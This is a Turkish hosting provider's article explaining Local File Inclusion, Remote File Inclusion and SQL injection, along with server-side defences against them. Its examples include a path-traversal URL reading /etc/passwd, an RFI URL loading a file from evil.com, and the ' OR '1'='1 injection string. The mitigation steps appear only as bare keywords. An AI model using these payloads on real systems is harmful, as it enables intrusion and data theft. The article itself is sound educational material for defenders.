İLE %100 UYUMLU: Güvenli E-Posta Hosting Hizmetimizi 1 AY ÜCRETSİZ Deneyin! HEMEN OLUŞTURUN
Web uygulamalarının güvenliği, sadece yazılım katmanında değil, aynı zamanda sunucu tarafında da sıkı önlemler alınmasını gerektirir. Local File Inclusion (LFI), Remote File Inclusion (RFI) ve SQL Injection gibi saldırılar, sistemlerin zaaflarını hedef alarak hem veri ihlallerine hem de sistem kontrolünün ele geçirilmesine neden olabilir. Bu makalede, söz konusu zafiyetlerin ne olduğu, nasıl çalıştığı ve bu zafiyetlere karşı alınabilecek sunucu tabanlı güvenlik önlemleri detaylı şekilde ele alınmaktadır.
İçindekiler
LFI, saldırganın hedef sistemdeki dosyaları çağırmasına veya çalıştırmasına olanak sağlayan bir güvenlik açığıdır. Genellikle PHP tabanlı uygulamalarda görülür ve include, require gibi fonksiyonların kullanıcı girdisiyle kontrolsüz kullanılması durumunda ortaya çıkar.
include
require
http://example.com/page.php?file=../../../../etc/passwd
allow_url_include
allow_url_fopen
basename()
realpath()
RFI, uzak bir kaynaktan dosya çağırmaya ve çalıştırmaya olanak sağlayan bir güvenlik zafiyetidir. LFI’den farklı olarak saldırganın kendi kontrolündeki bir sunucudan zararlı dosya çalıştırması mümkündür.
http://example.com/page.php?file=http://evil.com/malicious.txt
Off
SQL Injection, kullanıcı girişleri aracılığıyla SQL sorgularının manipüle edilmesini sağlar. Bu zafiyet, veritabanına doğrudan müdahale ile veri çalınmasına, güncellenmesine veya silinmesine neden olabilir.
SELECT * FROM users WHERE username = '$user' AND password = '$pass';
Eğer $user değeri ' OR '1'='1 şeklinde girilirse tüm kullanıcılar listelenebilir.
$user
' OR '1'='1
/var/www/html
chmod
chown
umask
LFI, RFI ve SQL Injection gibi yaygın zafiyetler, çoğu zaman basit bir ihmal ya da yetersiz giriş kontrolü nedeniyle büyük güvenlik açıklarına dönüşebilir. Bu zafiyetlerin önlenmesi, yalnızca kodlama düzeyinde değil, aynı zamanda sunucu yapılandırması ve güvenlik politikalarının bütüncül olarak ele alınması ile mümkündür. Web uygulamalarının barındırıldığı altyapı, bu tehditlere karşı her an tetikte olacak şekilde tasarlanmalı ve denetlenmelidir.